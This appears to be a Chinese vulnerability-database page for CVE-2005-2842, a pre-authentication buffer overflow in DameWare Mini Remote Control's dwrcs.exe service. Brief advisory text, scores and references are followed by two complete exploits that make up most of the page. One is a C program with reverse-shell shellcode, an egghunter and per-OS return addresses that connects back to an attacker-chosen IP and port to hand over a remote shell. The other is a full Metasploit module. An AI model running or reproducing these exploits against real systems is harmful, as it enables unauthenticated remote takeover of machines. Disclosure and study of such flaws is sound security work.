CVE-2005-2842
CVSS7.5
发布时间 :2005-09-08 06:03:00
修订时间 :2017-09-15 21:29:00
NMCOEP    

[原文]Buffer overflow in dwrcs.exe in DameWare Mini Remote Control before 4.9.0 allows remote attackers to execute arbitrary code via the username.


[CNNVD]DameWare Mini Remote Control Server dwrcs.exe缓冲区溢出漏洞(CNNVD-200509-091)

        Mini Remote Control是32位Windows操作系统上的远程控制系统,允许管理员远程控制LAN或WAN中的机器。
        DameWare Mini Remote Control Server中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以远程执行任意代码。
        起因是在检查用户名时不安全的调用了lstrcpyA函数。未经认证的远程攻击者可以通过向DameWare Remote Control Server的默认监听端口6129 TCP发送特制报文来利用这个漏洞。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:dameware_development:mini_remote_control_server:4.1.0.0
cpe:/a:dameware_development:mini_remote_control_server:4.8
cpe:/a:dameware_development:mini_remote_control_server:4.2.0.0
cpe:/a:dameware_development:mini_remote_control_server:4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2842
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2842
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-091
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html
(VENDOR_ADVISORY)  FULLDISC  20050831 Dameware critical hole
http://securitytracker.com/id?1014830
(VENDOR_ADVISORY)  SECTRACK  1014830
http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txt
(VENDOR_ADVISORY)  MISC  http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txt
http://www.kb.cert.org/vuls/id/170905
(VENDOR_ADVISORY)  CERT-VN  VU#170905
http://www.securityfocus.com/bid/14707
(PATCH)  BID  14707
http://www.vupen.com/english/advisories/2005/1596
(UNKNOWN)  VUPEN  ADV-2005-1596
https://www.exploit-db.com/exploits/42703/
(UNKNOWN)  EXPLOIT-DB  42703

- 漏洞信息

DameWare Mini Remote Control Server dwrcs.exe缓冲区溢出漏洞
高危 缓冲区溢出
2005-09-08 00:00:00 2005-10-20 00:00:00
远程  
        Mini Remote Control是32位Windows操作系统上的远程控制系统,允许管理员远程控制LAN或WAN中的机器。
        DameWare Mini Remote Control Server中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以远程执行任意代码。
        起因是在检查用户名时不安全的调用了lstrcpyA函数。未经认证的远程攻击者可以通过向DameWare Remote Control Server的默认监听端口6129 TCP发送特制报文来利用这个漏洞。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.dameware.com

- 漏洞信息 (1190)

DameWare Mini Remote Control 4.0 < 4.9 (Client Agent) Remote Exploit (EDBID:1190)
windows remote
2005-08-31 Verified
6129 jpno5
N/A [点击下载]
/************************************************************************************************
*                            _                   ______
*                           (_)___  ____  ____  / ____/
*                          / / __ \/ __ \/ __ \/___ \
*                         / / /_/ / / / / /_/ /___/ /
*                      __/ / .___/_/ /_/\____/_____/
*                     /___/_/======================
*************************************************************************************************
*
*                                       DameWare Mini Remote Control Client Agent Service
*                                               Another Pre-Authentication Buffer Overflow
*                                                                By Jackson Pollocks No5
*                                                                         www.jpno5.com
*
*
*       Summary
*               +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*               DameWare Mini Remote Control is "A lightweight remote control intended primarily
*               for administrators and help desks for quick and easy deployment without
*               external dependencies and machine reboot.
*
*               Developed specifically for the 32-bit Windows environment (Windows 95/98/Me/NT/2000/XP),
*               DameWare Mini Remote Control is capable of using the Windows challenge/response authentication
*               and is able to be run as both an application and a service.
*
*               Some additional features include View Only, Cursor control, Remote Clipboard, Performance Settings,
*               Inactivity control, TCP only, Service Installation and Ping."
*
*               A buffer overflow vulnerability can be exploited remotely by an unauthenticated attacker
*               who can access the DameWare Mini Remote Control Server.
*
*               By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP.
*               An attacker can construct a specialy crafted packet and exploit this vulnerability.
*               The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.
*
*
*       Severity:   Critical
*
*       Impact:         Code Execution
*
*       Local:          Yes
*
*       Remote:         Yes
*
*       Patch:          Download version 4.9.0 or later and install over your existing installation.
*                               You can download the latest version of your DameWare Development Product at
*                               http://www.dameware.com/download
*
*       Details:        Affected versions will be any ver in above 4.0 and prior to 4.9
*                               of the Mini Remote Client Agent Service (dwrcs.exe).
*
*       Discovery:  i discovered this while using the dameware mini remote control client.
*                               i accidently pasted in a large string of text instead of my username.
*                               Clicking connect led to a remote crash of the application server.
*
*       Credits:        Can't really remember who's shellcode i used, more than likely it was
*                               written by Brett Moore.
*
*                               The egghunter was written by MMiller(skape). {Which kicks ass btw}
*
*                               Thanks to spoonm for tracking that NtAccessCheckAndAuditAlarm
*                               universal syscall down.
*
*                               Some creds to Adik as well, i did code my own exploit but it had none
*                               of that fancy shit like OS and SP detection. So basicly i just modded
*                               the payload from the old dameware exploit(ver 3.72).
*
*                               A little cred to me as well, after all i did put all them guys great
*                               work together to make something decent :)
*
************************************************************************************/

#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")

#define ACCEPT_TIMEOUT  25
#define RECVTIMEOUT             15

#define UNKNOWN         0
#define WIN2K           1
#define WINXP           2
#define WIN2K3          3
#define WINNT           4

               unsigned char rshell[] = {
       "\x41\x42\x41\x42\x41\x42\x41\x42\x90\x90\x90\x90\x90\x90\x90\x90"// For The Egghunter
       "\x90\xFC\x6A\xEB\x52\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B"// Reverse Shell
       "\x45\x3C\x8B\x7C\x05\x78\x01\xEF\x83\xC7\x01\x8B\x4F\x17\x8B\x5F"
       "\x1F\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84"
       "\xC0\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
       "\x8B\x5F\x23\x01\xEB\x66\x8B\x0C\x4B\x8B\x5F\x1B\x01\xEB\x03\x2C"
       "\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40\x30\x8B\x40\x0C"
       "\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E\xEC\x50\xFF\xD6"
       "\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5F\x54\xFF\xD0"
       "\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66\x81\xED\x08\x02"
       "\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF\xD6\x53\x53\x53"
       "\x53\x43\x53\x43\x53\xFF\xD0\x68\x90\x90\x90\x90\x66\x68\x90\x90"
       "\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF\xD6\x6A\x10\x51"
       "\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50\x59\x29\xCC\x89"
       "\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD\xFE\x42\x2D\xFE"
       "\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3\x16\xFF\x75\x28"
       "\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51\x55\x51\xFF\xD0"
       "\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37\xFF\xD0\x68\xE7"
       "\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF\xD0\x68\xEF\xCE"
       "\xE0\x60\x53\xFF\xD6\xFF\xD0"
       };

               unsigned char buff[40] = {
       "\x30\x11\x00\x00\x00\x00\x00\x00\xC3\xF5\x28\x5C\x8F\xC2\x0D\x40"// OS Detection
       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       "\x00\x00\x00\x00\x01\x00\x00\x00"
       };

               unsigned char fpay[] = {
       "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"// Egghunter
       "\xef\xb8\x41\x42\x41\x42\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
       "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc"
};


long ip(char *hostname);
void shell (int sock);

int check(char *host,unsigned short tport, unsigned int *sp);

struct timeval tv;
fd_set fds;
char buff1[5000]="";

struct spl{
       unsigned long eip; char off[20];
};

struct{
       char type[10]; struct spl sp[7];
}

target_os[]={{  //Could proberly be doing with some better offsets
       "UNKNOWN"  ,{{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN 2000" ,{{ 0x750362c3,"ws2_32.dll"   },{ 0x75035173,"ws2_32.dll"  },{ 0x7C2FA0F7,"ws2_32.dll"  },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN XP"   ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll"  },{ 0x7C941EED,"ws2_32.dll"  },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN 2003" ,{{ 0x77E216B8,"advapi32.dll" },{ 0x77FD1F89,"ntdll.dll"   },{ 0x77E216B8,"ntdll.dll"   },{ 0x77E216B8,"advapi32.dll" },{ 0x00000000,"unknown.dll"  },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll"  }}},{
       "WIN NT4"  ,{{ 0x77777777,"unknown.dll"  },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll"  },{ 0x77777772,"unknown.dll" },{ 0x77f32836,"kernel32.dll" }}}
};

int main(int argc,char *argv[])
{
               WSADATA wsaData;
               struct sockaddr_in targetTCP, localTCP, inAccTCP;
               int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;

               unsigned char packet[24135]="";
               unsigned short lport, tport;
               unsigned long lip, tip;
               unsigned int ser_p=0;
               int ver=0;

       printf("\n\n        ====== D4m3w4r3 eXpLo1t, By jpno5 ======\n");
       printf("        ======    http://www.jpno5.com    ======\n\n");
       if(argc < 5){ printf("[+] %s Target_Ip Target_Port Return_Ip Return_Port\n\n",argv[0]);return 1;}

       WSAStartup(0x0202, &wsaData);

       tip=ip(argv[1]);
       tport = atoi(argv[2]);
       lip=inet_addr(argv[3])^(long)0x00000000;
       lport=htons(atoi(argv[4]))^(short)0x0000;

       memcpy(&rshell[184], &lip, 4);
       memcpy(&rshell[190], &lport, 2);

       memset(&targetTCP, 0, sizeof(targetTCP));memset(&localTCP, 0, sizeof(localTCP));

       targetTCP.sin_family = AF_INET;
       targetTCP.sin_addr.s_addr = tip;
       targetTCP.sin_port = htons(tport);

       localTCP.sin_family = AF_INET;
       localTCP.sin_addr.s_addr = INADDR_ANY;
       localTCP.sin_port = htons((unsigned short)atoi(argv[4]));

       if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)     {
               printf("\t\t\t[ FAILED ]\n");
               WSACleanup();
               return 1;
       }
       if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
               printf("\t\t\t[ FAILED ]\n");
               WSACleanup();
               return 1;
       }

       printf("[#] Listening For Shell On: %s...",argv[4]);

       if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0){
               printf("\t\t\n Binding To Port: %s Failed! Make Sure It Aint In Use Arleady\n",argv[4]);
               WSACleanup();
               return 1;
       }

       if(listen(localSockTCP,1) != 0){
               printf("\t\t\t[ FAILED ]\nFailed to listen on port: %s!\n",argv[4]);
               WSACleanup();
               return 1;
       }

       ver = check(argv[1],(unsigned short)atoi(argv[2]),&ser_p);

       printf("\n[*] Target: %s SP: %d...",target_os[ver].type,ser_p);

       memcpy(packet,"\x10\x27",2);
       memcpy(packet+0xc4+9,rshell,strlen(rshell));
       *(unsigned long*)&packet[516] = target_os[ver].sp[ser_p].eip;
       memcpy(packet+520,fpay,strlen(fpay));

       if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
               printf("\n[x] Connection to host failed!\n");
               WSACleanup();
               exit(1);
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);
       tv.tv_sec = RECVTIMEOUT;
       tv.tv_usec = 0;FD_ZERO(&fds);
       FD_SET(sockTCP,&fds);

       if((select(1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);}else{
                       printf("[x] Timeout! Failed to recv packet.\n");
                       exit(1);
               }

       memset(buff1,0,sizeof(buff1));
       switchon=0;ioctlsocket(sockTCP,FIONBIO,&switchon);

       if (send(sockTCP, buff, sizeof(buff),0) == -1){
               printf("[x] Failed to inject packet!\n");
               WSACleanup();
               return 1;
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);
       tv.tv_sec = RECVTIMEOUT;tv.tv_usec = 0;
       FD_ZERO(&fds);FD_SET(sockTCP,&fds);

       if((select(sockTCP+1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);switchon=0;
       ioctlsocket(sockTCP,FIONBIO,&switchon);

       if (send(sockTCP, packet, sizeof(packet),0) == -1){
               printf("[x] Failed to inject packet! \n");
               WSACleanup();
               return 1;
       }
       }else{
               printf("\n[x] Timedout! Failed to receive packet!\n");
               WSACleanup();
               return 1;
       }

       closesocket(sockTCP);

       printf("\n[*] Waiting for Shell...\r");

       switchon=1;
       ioctlsocket(localSockTCP,FIONBIO,&switchon);
       tv.tv_sec = ACCEPT_TIMEOUT;
       tv.tv_usec = 0;FD_ZERO(&fds);
       FD_SET(localSockTCP,&fds);

       if((select(1,&fds,0,0,&tv))>0){
               acsz = sizeof(inAccTCP);
               accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
               printf("\n[*] Enjoy...\n\n");
               shell(accSockTCP);
       }else{
               printf("\n[x] Exploit Failed! Proberly Patched\n");
               WSACleanup();
       }
       return 0;
}

long ip(char *hostname) {
       struct hostent *he;
       long ipaddr;

       if ((ipaddr = inet_addr(hostname)) < 0) {
       if ((he = gethostbyname(hostname)) == NULL) {
               printf("[x] Failed to resolve host: %s!\n\n",hostname);
               WSACleanup();exit(1);
       }

       memcpy(&ipaddr, he->h_addr, he->h_length);}return ipaddr;}

 void shell (int sock){
 struct timeval tv;int length;
 unsigned long o[2];
 char buffer[1000];

 tv.tv_sec = 1;tv.tv_usec = 0;
 while (1){ o[0] = 1;o[1] = sock;
       length = select (0, (fd_set *)&o, NULL, NULL, &tv);
       if(length == 1){length = recv (sock, buffer, sizeof (buffer), 0);
       if (length <= 0) {
               printf ("[x] Connection closed.\n");
               WSACleanup();
               return;
       }
       length = write (1, buffer, length);
       if (length <= 0) {
               printf ("[x] Connection closed.\n");
               WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));
       if (length <= 0) {
               printf ("[x] Connection closed.\n");
               WSACleanup();return;}length = send(sock, buffer, length, 0);
       if (length <= 0) {
               printf ("[x] Connection closed.\n");
               WSACleanup();
               return;
               }}}}

int check(char *host,unsigned short tport, unsigned int *sp){

       int sockTCP,switchon;
       struct sockaddr_in targetTCP;
       struct timeval tv;fd_set fds;

       memset(&targetTCP,0,sizeof(targetTCP));
       targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = inet_addr(host);targetTCP.sin_port = htons(tport);

       if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
               printf("\t\t\t[ FAILED ]\n Socket not initialized! Exiting...\n");
               WSACleanup();
               return 1;
       }

       if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
               printf("[x] Connection to host failed!\n");
               WSACleanup();
               exit(1);
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);
       tv.tv_sec = RECVTIMEOUT;
       tv.tv_usec = 0;
       FD_ZERO(&fds);FD_SET(sockTCP,&fds);

       if((select(1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);}
       else{
               printf("[x]Timedout! Doesn't Look Like A Dameware Server\n");
               exit(1);
       }

       switchon=0;
       ioctlsocket(sockTCP,FIONBIO,&switchon);

       if (send(sockTCP, buff, sizeof(buff),0) == -1){
               printf("[x] Failed\n");
               WSACleanup();
               return 1;
       }

       switchon=1;
       ioctlsocket(sockTCP,FIONBIO,&switchon);

       tv.tv_sec = RECVTIMEOUT;
       tv.tv_usec = 0;FD_ZERO(&fds);
       FD_SET(sockTCP,&fds);

       if((select(sockTCP+1,&fds,0,0,&tv))>0){
               recv(sockTCP, buff1, sizeof(buff1),0);
               closesocket(sockTCP);
       } else {
               printf("\n[x] Timedout!\n");
               WSACleanup();
               return 1;
       }

       if(buff1[8]==5 && buff1[12]==0){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WIN2K;
       }  else if(buff1[8]==5 && buff1[12]==1){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WINXP;
       }  else if(buff1[8]==5 && buff1[12]==2){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WIN2K3;
       } else if(buff1[8]==4){*sp = atoi(&buff1[37]);
       closesocket(sockTCP);
       return WINNT;
       } else{
               closesocket(sockTCP);
       return UNKNOWN;
       }
}

// milw0rm.com [2005-08-31]
		

- 漏洞信息 (F144179)

Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow (PacketStormID:F144179)
2017-09-15 00:00:00
James Fitts  metasploit.com
exploit,remote,overflow,arbitrary,code execution
CVE-2005-2842
[点击下载]

This Metasploit module exploits a stack based buffer overflow vulnerability found in Dameware Mini Remote Control v4.0. The overflow is caused when sending an overly long username to the DWRCS executable listening on port 6129. The username is read into a strcpy() function causing an overwrite of the return pointer leading to arbitrary code execution.

require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack based buffer overflow vulnerability found
                in Dameware Mini Remote Control v4.0. The overflow is caused when sending
                an overly long username to the DWRCS executable listening on port 6129.
                The username is read into a strcpy() function causing an overwrite of
                the return pointer leading to arbitrary code execution.
            },
            'Author'         => [ 'James Fitts' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'CVE', '2005-2842' ],
                    [ 'BID', '14707' ],
                    [ 'URL', 'http://secunia.com/advisories/16655' ],
                    [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Privileged'     => true,
            'Payload'        =>
                {
                    'Space' => 140,
                    'BadChars' => "\x00\x0a\x0d",
                    'StackAdjustment' => -3500,
                    'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
                    'Compat'        =>
                        {
                            'SymbolLookup' => '+ws2ord',
                        },
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 
                        'Windows XP SP3 EN', 
                            { 
                                # msvcrt.dll
                                # push esp/ retn
                                'Ret' => 0x77c35459, 
                            } 
                    ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Sept 01 2005'))
 
        register_options(
            [
                Opt::RPORT(6129),
            ], self.class )
    end
 
    def pkt1
        p = payload.encoded
 
        boom = "\x43" * 259
        boom[100, 4] = [target.ret].pack('V')
        boom[108, p.length] = p
 
        packet = "\x00" * 4056
        packet[0, 4] = "\x30\x11\x00\x00"
        packet[4, 4] = "\x00\x00\x00\x00"
        packet[8, 4] = "\xd7\xa3\x70\x3d"
        packet[12, 4] = "\x0a\xd7\x0d\x40"
        packet[16, 20] = "\x00" * 20
        packet[36, 4] = "\x01\x00\x00\x00"
 
        packet[40, 4] = [0x00002710].pack('V')
        packet[196, 259] = rand_text_alpha(259)
        packet[456, 259] = boom
        packet[716, 259] = rand_text_alpha(259)
        packet[976, 259] = rand_text_alpha(259)
        packet[1236, 259] = rand_text_alpha(259)
        packet[1496, 259] = rand_text_alpha(259)
 
        return packet
    end
 
    def pkt2
        packet = "\x00" * 4096
        packet[756, 259] = rand_text_alpha(259)
 
        return packet
         
    end
 
    def exploit
        connect
 
        sock.put(pkt1)
        sock.recv(1024)
        sock.put(pkt2)
        sock.recv(84)
 
        handler
        disconnect
    end
 
end
__END__

    

- 漏洞信息

19119
DameWare Mini Remote Control username Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in DameWare Mini Remote Control. The 'dwrcs.exe' service fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long username, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-08-31 Unknow
2005-08-31 Unknow

- 解决方案

Upgrade to version 4.9.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站